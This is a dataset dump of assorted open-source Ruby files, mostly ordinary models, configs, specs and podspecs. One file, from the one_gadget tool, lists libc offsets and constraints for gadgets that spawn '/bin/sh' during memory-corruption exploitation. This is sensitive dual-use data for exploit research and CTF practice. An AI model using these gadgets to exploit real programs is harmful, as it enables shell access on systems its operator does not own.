hexsha (stringlengths 40-40) | size (int64 2-1.01M) | content (stringlengths 2-1.01M) | avg_line_length (float64 1.5-100) | max_line_length (int64 2-1k) | alphanum_fraction (float64 0.25-1)
---|---|---|---|---|---
110db494f5aded2d546d90b369aa826bef436561 | 569 | # frozen_string_literal: true
module ReleaseTools
module SharedStatus
extend self
def dry_run?
ENV['TEST'].present?
end
def critical_security_release?
ENV['SECURITY'] == 'critical'
end
def security_release?
return true if ENV['SECURITY'].present?
@security_release == true
end
def as_security_release(security_release = true)
@security_release = security_release
yield
ensure
@security_release = false
end
def user
`git config --get user.name`.strip
end
end
end
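# Hedged usage sketch, not part of the original file: `do_release` is a
# hypothetical caller, and ActiveSupport's String#present? is assumed to be
# loaded (the module itself relies on it).
#
#   ReleaseTools::SharedStatus.as_security_release do
#     # security_release? is true only inside this block (or when
#     # ENV['SECURITY'] is set); the ensure clause resets it afterwards.
#     do_release if ReleaseTools::SharedStatus.security_release?
#   end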
| 17.242424 | 52 | 0.650264 |
21750a3be6bc218ffb8bb7cca20eb7fdd23a0386 | 188 | class Version
include Mongoid::Document
include Mongoid::Timestamps::Created
field :title
field :body
belongs_to :article
belongs_to :user
index({ :article_id => 1 })
end
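# Hedged usage sketch (assumes an Article model with `has_many :versions`,
# which is not shown here):
#
#   article.versions.create!(title: 'Draft 2', body: '...', user: current_user)
#   Version.where(article_id: article.id).asc(:created_at) # served by the declared index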
| 14.461538 | 38 | 0.712766 |
e2be813723359d7b29839477f2f73b91929cec95 | 441 | # frozen_string_literal: false
require 'spec_helper'
RSpec.describe Struct do
let(:s1) do
person = described_class.new(:name, :age)
person.new('bob', 60)
end
describe '#attributes' do
it 'to be { ... }' do
expect(s1.attributes).to eq(name: 'bob', age: 60)
end
end
describe '#replace' do
it 'to be "tom"' do
s1.replace(name: 'tom', age: 28)
expect(s1.name).to eq('tom')
end
end
end
| 16.961538 | 55 | 0.600907 |
879e0987ff70b26cb879bf8fd18a53a7d30b3aba | 644 | require "fog/core/model"
module Fog
module Google
class SQL
##
# A Google Cloud SQL service flag resource
#
# @see https://cloud.google.com/sql/docs/mysql/admin-api/v1beta4/flags
class Flag < Fog::Model
identity :name
attribute :allowed_string_values, :aliases => "allowedStringValues"
attribute :applies_to, :aliases => "appliesTo"
attribute :kind
attribute :max_value, :aliases => "maxValue"
attribute :min_value, :aliases => "minValue"
attribute :requires_restart, :aliases => "requiresRestart"
attribute :type
end
end
end
end
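# Hedged illustration of the :aliases mapping (the JSON attribute shape is
# assumed from the linked API docs, not taken from this file):
#
#   flag = Fog::Google::SQL::Flag.new("name" => "max_connections",
#                                     "requiresRestart" => true)
#   flag.requires_restart # => true, read through the camelCase alias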
| 26.833333 | 76 | 0.631988 |
5d87a943a5dd1828aacdee8b16187f847bcffac9 | 767 | module Releasetool
module Util
DIR = "release_notes"
VERSION_FILE = ENV['RELEASETOOL_VERSION_FILE'] || "config/initializers/00-version.rb" # Rails out-of-the-box default
TEMPLATE_FILE = "__TEMPLATE__.md" # relative to DIR
RELEASE_MARKER_FILE = ".RELEASE_NEW_VERSION" # should be a config var
def stored_version
fail Thor::Error.new("No stored version... did you forget to do release start?") unless File.exist?(RELEASE_MARKER_FILE)
File.read(RELEASE_MARKER_FILE).strip
end
def remove_stored_version
guarded_system("rm #{RELEASE_MARKER_FILE}") if File.exist?(RELEASE_MARKER_FILE)
end
def guarded_system(command)
puts command
system(command) or raise Thor::Error.new("Couldn't '#{command}'")
end
end
end
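# Hedged usage sketch (a hypothetical Thor CLI; not part of the gem):
#
#   class Release < Thor
#     include Releasetool::Util
#
#     desc 'finish', 'tag the version recorded by `release start`'
#     def finish
#       guarded_system("git tag #{stored_version}")
#       remove_stored_version
#     end
#   end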
| 31.958333 | 126 | 0.713168 |
ed32dd149060e5f8ea6c0bd96f43bd6438bca972 | 3,789 | Rails.application.configure do
# Settings specified here will take precedence over those in config/application.rb.
# Code is not reloaded between requests.
config.cache_classes = true
# Eager load code on boot. This eager loads most of Rails and
# your application in memory, allowing both threaded web servers
# and those relying on copy on write to perform better.
# Rake tasks automatically ignore this option for performance.
config.eager_load = true
# Full error reports are disabled and caching is turned on.
config.consider_all_requests_local = false
config.action_controller.perform_caching = true
# Attempt to read encrypted secrets from `config/secrets.yml.enc`.
# Requires an encryption key in `ENV["RAILS_MASTER_KEY"]` or
# `config/secrets.yml.key`.
config.read_encrypted_secrets = true
# Disable serving static files from the `/public` folder by default since
# Apache or NGINX already handles this.
config.public_file_server.enabled = ENV['RAILS_SERVE_STATIC_FILES'].present?
# Compress JavaScripts and CSS.
config.assets.js_compressor = :uglifier
# config.assets.css_compressor = :sass
# Do not fallback to assets pipeline if a precompiled asset is missed.
config.assets.compile = false
# `config.assets.precompile` and `config.assets.version` have moved to config/initializers/assets.rb
# Enable serving of images, stylesheets, and JavaScripts from an asset server.
# config.action_controller.asset_host = 'http://assets.example.com'
# Specifies the header that your server uses for sending files.
# config.action_dispatch.x_sendfile_header = 'X-Sendfile' # for Apache
# config.action_dispatch.x_sendfile_header = 'X-Accel-Redirect' # for NGINX
# Mount Action Cable outside main process or domain
# config.action_cable.mount_path = nil
# config.action_cable.url = 'wss://example.com/cable'
# config.action_cable.allowed_request_origins = [ 'http://example.com', /http:\/\/example.*/ ]
# Force all access to the app over SSL, use Strict-Transport-Security, and use secure cookies.
# config.force_ssl = true
# Use the lowest log level to ensure availability of diagnostic information
# when problems arise.
config.log_level = :debug
# Prepend all log lines with the following tags.
config.log_tags = [ :request_id ]
# Use a different cache store in production.
# config.cache_store = :mem_cache_store
# Use a real queuing backend for Active Job (and separate queues per environment)
# config.active_job.queue_adapter = :resque
# config.active_job.queue_name_prefix = "quora_clone_#{Rails.env}"
config.action_mailer.perform_caching = false
# Ignore bad email addresses and do not raise email delivery errors.
# Set this to true and configure the email server for immediate delivery to raise delivery errors.
# config.action_mailer.raise_delivery_errors = false
# Enable locale fallbacks for I18n (makes lookups for any locale fall back to
# the I18n.default_locale when a translation cannot be found).
config.i18n.fallbacks = true
# Send deprecation notices to registered listeners.
config.active_support.deprecation = :notify
# Use default logging formatter so that PID and timestamp are not suppressed.
config.log_formatter = ::Logger::Formatter.new
# Use a different logger for distributed setups.
# require 'syslog/logger'
# config.logger = ActiveSupport::TaggedLogging.new(Syslog::Logger.new 'app-name')
if ENV["RAILS_LOG_TO_STDOUT"].present?
logger = ActiveSupport::Logger.new(STDOUT)
logger.formatter = config.log_formatter
config.logger = ActiveSupport::TaggedLogging.new(logger)
end
# Do not dump schema after migrations.
config.active_record.dump_schema_after_migration = false
end
| 41.184783 | 102 | 0.757192 |
ac2a483e5fd469115260e05895e40268931cafb9 | 767 | Pod::Spec.new do |s|
s.name = 'Collor'
s.version = '1.1.23'
s.summary = 'A MVVM data-oriented framework for UICollectionView.'
s.homepage = 'https://github.com/voyages-sncf-technologies/Collor'
s.screenshots = 'https://raw.githubusercontent.com/voyages-sncf-technologies/Collor/master/resources/screenshot.jpg'
s.license = { :type => 'BSD', :file => 'LICENSE' }
s.author = { 'Gwenn Guihal' => '[email protected]' }
s.source = { :git => 'https://github.com/voyages-sncf-technologies/Collor.git', :tag => s.version.to_s }
s.social_media_url = 'https://twitter.com/_myrddin_'
s.ios.deployment_target = '8.0'
s.source_files = 'Collor/Classes/**/*'
s.swift_version = '4.0'
end
| 51.133333 | 123 | 0.6206 |
62fd99bd254980538ab7ec89879c68333300d81f | 1,164 | # == Schema Information
#
# Table name: users
#
# id :integer not null, primary key
# email :string(255) default(""), not null
# encrypted_password :string(255) default(""), not null
# reset_password_token :string(255)
# reset_password_sent_at :datetime
# remember_created_at :datetime
# sign_in_count :integer default(0), not null
# current_sign_in_at :datetime
# last_sign_in_at :datetime
# current_sign_in_ip :string(255)
# last_sign_in_ip :string(255)
# created_at :datetime not null
# updated_at :datetime not null
# role_id :integer
# approved :boolean default(FALSE), not null
#
module UsersHelper
# Returns the Gravatar (http://gravatar.com/) for the given user.
def gravatar_for(user, options = { size: 50 })
gravatar_id = Digest::MD5.hexdigest(user.email.downcase)
size = options[:size]
gravatar_url = "https://secure.gravatar.com/avatar/#{gravatar_id}?s=#{size}"
image_tag(gravatar_url, alt: user.name, class: "gravatar")
end
end
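# Hedged view usage sketch (ERB; assumes the user responds to #email and #name):
#
#   <%= gravatar_for(@user) %>            <%# 50px default %>
#   <%= gravatar_for(@user, size: 80) %>  <%# produces ?s=80 in the URL %>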
| 36.375 | 80 | 0.609966 |
e906a176e008b3b7b83a02b00fe95562feaf8c7b | 1,438 | #
# Cookbook Name:: delivery-cluster
# Spec:: delivery_spec
#
# Author:: Salim Afiune (<[email protected]>)
#
# Copyright:: Copyright (c) 2015 Chef Software, Inc.
# License:: Apache License, Version 2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
require 'spec_helper'
describe 'delivery-cluster::delivery' do
let(:chef_run) do
ChefSpec::SoloRunner.new do |node|
node.set['delivery-cluster'] = cluster_data
end.converge(described_recipe)
end
before do
allow(File).to receive(:exist?).and_return(true)
end
it 'upgrades delivery through chef-ingredient' do
expect(chef_run).to upgrade_chef_ingredient('delivery')
end
it 'creates /etc/delivery directory' do
expect(chef_run).to create_directory('/etc/delivery')
end
it 'creates /etc/delivery/delivery.rb configuration file' do
expect(chef_run).to render_file('/etc/delivery/delivery.rb')
.with_content('delivery_fqdn')
end
end
| 29.346939 | 74 | 0.733658 |
e979fe29791aba7ba4442db39301c690dbdb37e6 | 600 | # frozen_string_literal: true
require 'grpc_mock/api'
require 'grpc_mock/version'
require 'grpc_mock/configuration'
require 'grpc_mock/adapter'
require 'grpc_mock/stub_registry'
module GrpcMock
extend GrpcMock::Api
class << self
def enable!
adapter.enable!
end
def disable!
adapter.disable!
end
def reset!
GrpcMock.stub_registry.reset!
end
def stub_registry
@stub_registry ||= GrpcMock::StubRegistry.new
end
def adapter
@adapter ||= Adapter.new
end
def config
@config ||= Configuration.new
end
end
end
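# Hedged test-setup sketch (RSpec is an assumption; the calls mirror the API
# defined above):
#
#   RSpec.configure do |config|
#     config.before(:suite) { GrpcMock.enable! }  # swap in the mock adapter
#     config.after(:each)   { GrpcMock.reset! }   # clear registered stubs
#     config.after(:suite)  { GrpcMock.disable! }
#   end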
| 15.789474 | 51 | 0.67 |
bf756a0dd5978afae267e01393ba345a853298bc | 826 | require 'spec_helper'
describe Signalwire::Relay::Calling::SendDigits do
let(:client) { Signalwire::Relay::Client.new(project: 'myproject', token: 'mytoken') }
let(:call) { Signalwire::Relay::Calling::Call.new(client, mock_call_hash.dig(:params, :params, :params)) }
let(:digits) { '1234' }
subject { described_class.new(call: call, digits: digits) }
let(:mock_protocol) { "my-protocol" }
before do
call.client.protocol = mock_protocol
end
describe "#execute_params" do
it "merges all values correctly" do
expect(subject.execute_params).to eq({
method: subject.method,
protocol: mock_protocol,
params: {
call_id: call.id,
control_id: subject.control_id,
node_id: call.node_id,
digits: digits
}
})
end
end
end
 | 28.482759 | 108 | 0.640436 |
87c4bf81b95d55b267c4991b5abcefa9e37ccdf4 | 475 | cask :v1 => 'propresenter' do
version '5.2.8'
sha256 '47981ded0b025db373897b0103e9fa2894f4f0a073596da3725a739d33716e11'
url "https://www.renewedvision.com/downloads/ProPresenter5_#{version}_b11499.dmg"
appcast 'https://www.renewedvision.com/update/ProPresenter5.php',
:sha256 => 'f70029136ad0273f64bdbe6eff1d838e18dba1a1e0c3fe6e85c88909fe4cbf64'
homepage 'http://www.renewedvision.com/propresenter.php'
license :unknown
app 'ProPresenter 5.app'
end
| 36.538462 | 87 | 0.783158 |
bfb0086ac2d38495b4fe0e87d961828bfef75e71 | 7,732 | # Copyright (c) 2016, 2022, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
require 'date'
# rubocop:disable Lint/UnneededCopDisableDirective, Metrics/LineLength
module OCI
# An array of metric objects containing raw metric data points to be posted to the Monitoring service.
#
class Monitoring::Models::PostMetricDataDetails
BATCH_ATOMICITY_ENUM = [
BATCH_ATOMICITY_ATOMIC = 'ATOMIC'.freeze,
BATCH_ATOMICITY_NON_ATOMIC = 'NON_ATOMIC'.freeze
].freeze
# **[Required]** A metric object containing raw metric data points to be posted to the Monitoring service.
#
# @return [Array<OCI::Monitoring::Models::MetricDataDetails>]
attr_accessor :metric_data
# Batch atomicity behavior. Requires either partial or full pass of input validation for
# metric objects in PostMetricData requests. The default value of NON_ATOMIC requires a
# partial pass: at least one metric object in the request must pass input validation, and
# any objects that failed validation are identified in the returned summary, along with
# their error messages. A value of ATOMIC requires a full pass: all metric objects in
# the request must pass input validation.
#
# Example: `NON_ATOMIC`
#
# @return [String]
attr_reader :batch_atomicity
# Attribute mapping from ruby-style variable name to JSON key.
def self.attribute_map
{
# rubocop:disable Style/SymbolLiteral
'metric_data': :'metricData',
'batch_atomicity': :'batchAtomicity'
# rubocop:enable Style/SymbolLiteral
}
end
# Attribute type mapping.
def self.swagger_types
{
# rubocop:disable Style/SymbolLiteral
'metric_data': :'Array<OCI::Monitoring::Models::MetricDataDetails>',
'batch_atomicity': :'String'
# rubocop:enable Style/SymbolLiteral
}
end
# rubocop:disable Metrics/CyclomaticComplexity, Metrics/AbcSize, Metrics/PerceivedComplexity
# rubocop:disable Metrics/MethodLength, Layout/EmptyLines, Style/SymbolLiteral
# Initializes the object
# @param [Hash] attributes Model attributes in the form of hash
# @option attributes [Array<OCI::Monitoring::Models::MetricDataDetails>] :metric_data The value to assign to the {#metric_data} property
# @option attributes [String] :batch_atomicity The value to assign to the {#batch_atomicity} property
def initialize(attributes = {})
return unless attributes.is_a?(Hash)
# convert string to symbol for hash key
attributes = attributes.each_with_object({}) { |(k, v), h| h[k.to_sym] = v }
self.metric_data = attributes[:'metricData'] if attributes[:'metricData']
raise 'You cannot provide both :metricData and :metric_data' if attributes.key?(:'metricData') && attributes.key?(:'metric_data')
self.metric_data = attributes[:'metric_data'] if attributes[:'metric_data']
self.batch_atomicity = attributes[:'batchAtomicity'] if attributes[:'batchAtomicity']
self.batch_atomicity = "NON_ATOMIC" if batch_atomicity.nil? && !attributes.key?(:'batchAtomicity') # rubocop:disable Style/StringLiterals
raise 'You cannot provide both :batchAtomicity and :batch_atomicity' if attributes.key?(:'batchAtomicity') && attributes.key?(:'batch_atomicity')
self.batch_atomicity = attributes[:'batch_atomicity'] if attributes[:'batch_atomicity']
self.batch_atomicity = "NON_ATOMIC" if batch_atomicity.nil? && !attributes.key?(:'batchAtomicity') && !attributes.key?(:'batch_atomicity') # rubocop:disable Style/StringLiterals
end
# rubocop:enable Metrics/CyclomaticComplexity, Metrics/AbcSize, Metrics/PerceivedComplexity
# rubocop:enable Metrics/MethodLength, Layout/EmptyLines, Style/SymbolLiteral
# Custom attribute writer method checking allowed values (enum).
# @param [Object] batch_atomicity Object to be assigned
def batch_atomicity=(batch_atomicity)
raise "Invalid value for 'batch_atomicity': this must be one of the values in BATCH_ATOMICITY_ENUM." if batch_atomicity && !BATCH_ATOMICITY_ENUM.include?(batch_atomicity)
@batch_atomicity = batch_atomicity
end
# rubocop:disable Metrics/CyclomaticComplexity, Metrics/AbcSize, Metrics/PerceivedComplexity, Layout/EmptyLines
# Checks equality by comparing each attribute.
# @param [Object] other the other object to be compared
def ==(other)
return true if equal?(other)
self.class == other.class &&
metric_data == other.metric_data &&
batch_atomicity == other.batch_atomicity
end
# rubocop:enable Metrics/CyclomaticComplexity, Metrics/AbcSize, Metrics/PerceivedComplexity, Layout/EmptyLines
# @see the `==` method
# @param [Object] other the other object to be compared
def eql?(other)
self == other
end
# rubocop:disable Metrics/AbcSize, Layout/EmptyLines
# Calculates hash code according to all attributes.
# @return [Fixnum] Hash code
def hash
[metric_data, batch_atomicity].hash
end
# rubocop:enable Metrics/AbcSize, Layout/EmptyLines
# rubocop:disable Metrics/AbcSize, Layout/EmptyLines
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def build_from_hash(attributes)
return nil unless attributes.is_a?(Hash)
self.class.swagger_types.each_pair do |key, type|
if type =~ /^Array<(.*)>/i
# check to ensure the input is an array given that the attribute
# is documented as an array but the input is not
if attributes[self.class.attribute_map[key]].is_a?(Array)
public_method("#{key}=").call(
attributes[self.class.attribute_map[key]]
.map { |v| OCI::Internal::Util.convert_to_type(Regexp.last_match(1), v) }
)
end
elsif !attributes[self.class.attribute_map[key]].nil?
public_method("#{key}=").call(
OCI::Internal::Util.convert_to_type(type, attributes[self.class.attribute_map[key]])
)
end
# or else data not found in attributes(hash), not an issue as the data can be optional
end
self
end
# rubocop:enable Metrics/AbcSize, Layout/EmptyLines
# Returns the string representation of the object
# @return [String] String presentation of the object
def to_s
to_hash.to_s
end
# Returns the object in the form of hash
# @return [Hash] Returns the object in the form of hash
def to_hash
hash = {}
self.class.attribute_map.each_pair do |attr, param|
value = public_method(attr).call
next if value.nil? && !instance_variable_defined?("@#{attr}")
hash[param] = _to_hash(value)
end
hash
end
private
# Outputs non-array value in the form of hash
# For object, use to_hash. Otherwise, just return the value
# @param [Object] value Any valid value
# @return [Hash] Returns the value in the form of hash
def _to_hash(value)
if value.is_a?(Array)
value.compact.map { |v| _to_hash(v) }
elsif value.is_a?(Hash)
{}.tap do |hash|
value.each { |k, v| hash[k] = _to_hash(v) }
end
elsif value.respond_to? :to_hash
value.to_hash
else
value
end
end
end
end
# rubocop:enable Lint/UnneededCopDisableDirective, Metrics/LineLength
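# Hedged construction sketch (the MetricDataDetails arguments are elided; both
# classes ship with the same SDK):
#
#   details = OCI::Monitoring::Models::PostMetricDataDetails.new(
#     metric_data: [OCI::Monitoring::Models::MetricDataDetails.new(...)],
#     batch_atomicity: 'ATOMIC' # omit to get the 'NON_ATOMIC' default set above
#   )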
| 39.85567 | 245 | 0.693482 |
d5ed894e7cc0b5b80a5d56be67d2c3e5f1afd95b | 2,178 | require 'one_gadget/gadget'
# https://gitlab.com/libcdb/libcdb/blob/master/libc/libc0.1-i686-2.19-18+deb8u3/lib/i386-kfreebsd-gnu/i686/cmov/libc-2.19.so
#
# Intel 80386
#
# GNU C Library (Debian GLIBC 2.19-18+deb8u3) stable release version 2.19, by Roland McGrath et al.
# Copyright (C) 2014 Free Software Foundation, Inc.
# This is free software; see the source for copying conditions.
# There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A
# PARTICULAR PURPOSE.
# Compiled by GNU CC version 4.8.4.
# Available extensions:
# crypt add-on version 2.1 by Michael Glad and others
# Native POSIX Threads Library by Ulrich Drepper et al
# GNU Libidn by Simon Josefsson
# BIND-8.2.3-T5B
# libc ABIs: UNIQUE
# For bug reporting instructions, please see:
# <http://www.debian.org/Bugs/>.
build_id = File.basename(__FILE__, '.rb').split('-').last
OneGadget::Gadget.add(build_id, 248423,
constraints: ["ebx is the GOT address of libc", "[esp+0x38] == NULL"],
effect: "execve(\"/bin/sh\", esp+0x38, environ)")
OneGadget::Gadget.add(build_id, 248459,
constraints: ["ebx is the GOT address of libc", "[eax] == NULL || eax == NULL", "[[esp+0x8]] == NULL || [esp+0x8] == NULL"],
effect: "execve(\"/bin/sh\", eax, [esp+0x8])")
OneGadget::Gadget.add(build_id, 248463,
constraints: ["ebx is the GOT address of libc", "[[esp+0x4]] == NULL || [esp+0x4] == NULL", "[[esp+0x8]] == NULL || [esp+0x8] == NULL"],
effect: "execve(\"/bin/sh\", [esp+0x4], [esp+0x8])")
OneGadget::Gadget.add(build_id, 406212,
constraints: ["ebx is the GOT address of libc", "[esp+0x8] == NULL"],
effect: "execl(\"/bin/sh\", \"sh\", [esp+0x8])")
OneGadget::Gadget.add(build_id, 406218,
constraints: ["ebx is the GOT address of libc", "eax == NULL"],
effect: "execl(\"/bin/sh\", eax)")
OneGadget::Gadget.add(build_id, 406222,
constraints: ["ebx is the GOT address of libc", "[esp+0x4] == NULL"],
effect: "execl(\"/bin/sh\", [esp+0x4])")
| 53.121951 | 158 | 0.598255 |
39d33344a3e7064c776e0e9ee82520d038f269a6 | 1,474 | # frozen_string_literal: true
RSpec.describe PrawnHtml::Tags::A do
subject(:a) { described_class.new(:a, attributes: { 'style' => 'color: #fb1' }) }
it { expect(described_class).to be < PrawnHtml::Tag }
context 'without an href attribute' do
before do
a.process_styles
end
it "styles doesn't include the link property" do
expect(a.styles).to eq(color: 'ffbb11', styles: [:underline])
end
end
context 'with an href attribute' do
subject(:a) do
described_class.new(:a, attributes: { 'href' => 'https://www.google.it', 'style' => 'font-weight: bold' })
end
before do
a.process_styles
end
it 'includes the link property in the styles' do
expect(a.styles).to match(color: '0000ee', link: 'https://www.google.it', styles: [:underline, :bold])
end
end
describe 'tag rendering' do
include_context 'with pdf wrapper'
let(:html) { '<a href="https://www.google.it">A link</a>' }
before { append_html_to_pdf(html) }
it 'sends the expected buffer elements to the pdf', :aggregate_failures do
expected_buffer = [{ size: TestUtils.default_font_size, text: 'A link', link: 'https://www.google.it', color: '0000ee', styles: [:underline] }]
expected_options = { leading: TestUtils.adjust_leading }
expected_extra = { bounding_box: nil, left_indent: 0 }
expect(pdf).to have_received(:puts).with(expected_buffer, expected_options, expected_extra)
end
end
end
| 30.708333 | 149 | 0.662822 |
e99a6b4c41d2f5b82350c81057258622e572dee4 | 1,674 | module AcceptanceTest
class << self
def included(klass)
klass.class_eval do
def self.log_to_console
Xeroizer::Logging.const_set :Log, Xeroizer::Logging::StdOutLog
end
def self.no_log
Xeroizer::Logging.const_set :Log, Xeroizer::Logging::DevNullLog
end
def self.let(symbol, &block)
return unless block_given?
unless respond_to? symbol
define_method symbol do
cached_method_result = instance_variable_get ivar_name = "@#{symbol}"
instance_variable_set(ivar_name, instance_eval(&block)) if cached_method_result.nil?
instance_variable_get ivar_name
end
end
end
end
end
end
def setup
config = load_config_from_file || load_config_from_env
@key_file = config.key_file
@consumer_key = config.consumer_key
@consumer_secret = config.consumer_secret
end
private
def load_config_from_file
the_file_name = File.join(File.dirname(__FILE__), '..', '..', '.oauth')
return nil unless File.exist? the_file_name
Xeroizer::OAuthConfig.load IO.read the_file_name
end
def load_config_from_env
assert_not_nil ENV["CONSUMER_KEY"], "No CONSUMER_KEY environment variable specified."
assert_not_nil ENV["CONSUMER_SECRET"], "No CONSUMER_SECRET environment variable specified."
assert_not_nil ENV["KEY_FILE"], "No KEY_FILE environment variable specified."
assert File.exist?(ENV["KEY_FILE"]), "The file <#{ENV["KEY_FILE"]}> does not exist."
Xeroizer::OAuthCredentials.new ENV["CONSUMER_KEY"], ENV["CONSUMER_SECRET"], ENV["KEY_FILE"]
end
end
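# Hedged usage sketch (test-unit style, matching the assert_* calls above; the
# PrivateApplication signature is an assumption about Xeroizer):
#
#   class ApiSmokeTest < Test::Unit::TestCase
#     include AcceptanceTest
#
#     let(:client) { Xeroizer::PrivateApplication.new(@consumer_key, @consumer_secret, @key_file) }
#
#     def test_credentials_loaded
#       assert_not_nil client # memoized by the custom `let` defined above
#     end
#   end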
| 31 | 98 | 0.682198 |
ff46dd5a50dc018a31c4264df416d6a2d233fcdc | 961 | # frozen_string_literal: true
require 'telegram/core_ext'
module Telegram
module API
module Bot
module Types
# See the {https://core.telegram.org/bots/api#maskposition official documentation}.
#
# @!attribute [rw] point
# @return [String]
# @!attribute [rw] x_shift
# @return [Float]
# @!attribute [rw] y_shift
# @return [Float]
# @!attribute [rw] scale
# @return [Float]
MaskPosition = Struct.new(
:point,
:x_shift,
:y_shift,
:scale
) do
include Telegram::CoreExt::Struct
def initialize(
point:,
x_shift:,
y_shift:,
scale:
)
super(
point&.to_s,
x_shift&.to_f,
y_shift&.to_f,
scale&.to_f
)
end
end
end
end
end
end
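# Hedged construction sketch (values are illustrative):
#
#   pos = Telegram::API::Bot::Types::MaskPosition.new(
#     point: :forehead, x_shift: -1.0, y_shift: 1.0, scale: 2.0
#   )
#   pos.point # => "forehead", coerced to String by the keyword initializer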
| 21.355556 | 91 | 0.463059 |
4aa4a20d4c4f4d8c9a503a21a7457393f38f9094 | 1,394 | # frozen_string_literal: true
module Theme
class Project < ShopifyCli::ProjectType
hidden_feature
title("Theme")
creator("Theme::Commands::Create")
connector("Theme::Commands::Connect")
register_command("Theme::Commands::Deploy", "deploy")
register_command("Theme::Commands::Generate", "generate")
register_command("Theme::Commands::Push", "push")
register_command("Theme::Commands::Serve", "serve")
register_task("Theme::Tasks::EnsureThemekitInstalled", :ensure_themekit_installed)
require Project.project_filepath("messages/messages")
register_messages(Theme::Messages::MESSAGES)
end
module Commands
autoload :Connect, Project.project_filepath("commands/connect")
autoload :Create, Project.project_filepath("commands/create")
autoload :Deploy, Project.project_filepath("commands/deploy")
autoload :Generate, Project.project_filepath("commands/generate")
autoload :Push, Project.project_filepath("commands/push")
autoload :Serve, Project.project_filepath("commands/serve")
end
module Tasks
autoload :EnsureThemekitInstalled, Project.project_filepath("tasks/ensure_themekit_installed")
end
module Forms
autoload :Create, Project.project_filepath("forms/create")
autoload :Connect, Project.project_filepath("forms/connect")
end
autoload :Themekit, Project.project_filepath("themekit")
end
| 34 | 98 | 0.753945 |
26b29cf8c9009df054dbbeeea0c7c8b9aa9fb27f | 661 | Pod::Spec.new do |s|
s.name = "SOMessaging"
s.version = "1.0.0"
s.summary = 'Messaging library for iOS 7.x'
s.platform = :ios, '7.0'
s.source = { :git => "https://github.com/SocialObjects-Software/SOMessaging.git", :tag => "1.0.0" }
s.description = <<-DESC
This is a simple library to easily create a messaging app with smooth animations.
DESC
s.homepage = 'https://github.com/SocialObjects-Software/SOMessaging'
s.license = 'MIT'
s.author = { "Artur Mkrtchyan" => "[email protected]" }
s.source_files = 'SOMessaging/*'
s.requires_arc = true
end
| 36.722222 | 107 | 0.588502 |
ab95a02b6f1107139b7849d0ee24ed08153d16a5 | 527 | Pod::Spec.new do |s|
s.name = 'Train'
s.version = '0.0.2'
s.summary = 'A simple dependency injection framework for objective c, written while traveling in a train.'
s.homepage = 'https://github.com/tomersh/Train'
s.author = { 'Tomer Shiri' => '[email protected]' }
s.source = { :git => 'https://github.com/tomersh/Train.git', :tag => "v0.0.2" }
s.platform = :ios
s.source_files = 'src/*'
s.requires_arc = false
s.license = { :type => 'NetBSD', :file => 'LICENSE' }
end
| 40.538462 | 113 | 0.586338 |
4a8e969ad0610a75a4466dba8548eb1f2a5b5334 | 307 | require "jekyll"
require "fileutils"
require "fyntech_feed/version"
require "fyntech_feed/generator"
module FyntechFeed
autoload :MetaTag, "fyntech_feed/meta-tag"
autoload :PageWithoutAFile, "fyntech_feed/page-without-a-file.rb"
end
Liquid::Template.register_tag "feed_meta", FyntechFeed::MetaTag
| 25.583333 | 69 | 0.794788 |
1d68a87417e9b9c2c1ad76cf63ca9c4ee841f53e | 7,535 | # frozen_string_literal: true
module Jekyll
class Renderer
attr_reader :document, :site
attr_writer :layouts, :payload
def initialize(site, document, site_payload = nil)
@site = site
@document = document
@payload = site_payload
end
# Fetches the payload used in Liquid rendering.
# It can be written with #payload=(new_payload)
# Falls back to site.site_payload if no payload is set.
#
# Returns a Jekyll::Drops::UnifiedPayloadDrop
def payload
@payload ||= site.site_payload
end
# The list of layouts registered for this Renderer.
# It can be written with #layouts=(new_layouts)
# Falls back to site.layouts if no layouts are registered.
#
# Returns a Hash of String => Jekyll::Layout identified
# as basename without the extension name.
def layouts
@layouts || site.layouts
end
# Determine which converters to use based on this document's
# extension.
#
# Returns Array of Converter instances.
def converters
@converters ||= site.converters.select { |c| c.matches(document.extname) }.sort
end
# Determine the extname the outputted file should have
#
# Returns String the output extname including the leading period.
def output_ext
@output_ext ||= (permalink_ext || converter_output_ext)
end
# Prepare payload and render the document
#
# Returns String rendered document output
def run
Jekyll.logger.debug "Rendering:", document.relative_path
assign_pages!
assign_current_document!
assign_highlighter_options!
assign_layout_data!
Jekyll.logger.debug "Pre-Render Hooks:", document.relative_path
document.trigger_hooks(:pre_render, payload)
render_document
end
# Render the document.
#
# Returns String rendered document output
# rubocop: disable AbcSize
def render_document
info = {
:registers => { :site => site, :page => payload["page"] },
}
output = document.content
if document.render_with_liquid?
Jekyll.logger.debug "Rendering Liquid:", document.relative_path
output = render_liquid(output, payload, info, document.path)
end
Jekyll.logger.debug "Rendering Markup:", document.relative_path
output = convert(output.to_s)
document.content = output
if document.place_in_layout?
Jekyll.logger.debug "Rendering Layout:", document.relative_path
output = place_in_layouts(output, payload, info)
end
output
end
# rubocop: enable AbcSize
# Convert the document using the converters which match this renderer's document.
#
# Returns String the converted content.
def convert(content)
converters.reduce(content) do |output, converter|
begin
converter.convert output
rescue StandardError => e
Jekyll.logger.error "Conversion error:",
"#{converter.class} encountered an error while "\
"converting '#{document.relative_path}':"
Jekyll.logger.error("", e.to_s)
raise e
end
end
end
# Render the given content with the payload and info
#
# content -
# payload -
# info -
# path - (optional) the path to the file, for use in ex
#
# Returns String the content, rendered by Liquid.
def render_liquid(content, payload, info, path = nil)
template = site.liquid_renderer.file(path).parse(content)
template.warnings.each do |e|
Jekyll.logger.warn "Liquid Warning:",
LiquidRenderer.format_error(e, path || document.relative_path)
end
template.render!(payload, info)
# rubocop: disable RescueException
rescue Exception => e
Jekyll.logger.error "Liquid Exception:",
LiquidRenderer.format_error(e, path || document.relative_path)
raise e
end
# rubocop: enable RescueException
# Checks if the layout specified in the document actually exists
#
# layout - the layout to check
#
